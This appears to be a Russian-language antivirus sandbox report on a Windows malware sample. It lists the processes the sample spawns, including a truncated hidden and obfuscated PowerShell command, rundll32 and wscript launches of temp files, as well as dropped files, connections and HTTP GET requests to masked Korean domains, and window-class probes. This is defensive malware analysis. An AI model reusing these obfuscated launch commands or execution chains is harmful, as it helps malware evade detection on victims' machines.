Техническая информация
Вредоносные функции
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = '%LOCALAPPDATA%\Temp';$dKPW =[tyPE](\"{1}{2}{0}\" -f'e','IO.fI','LeMOd'); $TOw=[typE](\"{1}{2}{0}{3}\" -f'e','iO.FILe','acC','...
- '<SYSTEM32>\rundll32.exe' <SYSTEM32>\shell32.dll,OpenAs_RunDLL %TEMP%\<Имя файла>
- '<SYSTEM32>\wscript.exe' "%TEMP%\tmp1139898353.vbs"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\<Имя файла>
- %TEMP%\tmp1139898353.vbs
- %APPDATA%\microsoft\windows\privacie\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012023091620230917\index.dat
Сетевая активность
Подключается к
- 'is###il.co.kr':80
- 'we###o.co.kr':80
- 'we###o.co.kr':443
TCP
Запросы HTTP GET
- http://www.is###il.co.kr/pg/adm/img/upload1/list.php?qu#####
- http://www.we###o.co.kr/404.html
Другие
- 'we###o.co.kr':443
UDP
- DNS ASK is###il.co.kr
- DNS ASK we###o.co.kr
Другое
Ищет следующие окна
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Запускает на исполнение
- '%ProgramFiles%\internet explorer\iexplore.exe' -Embedding
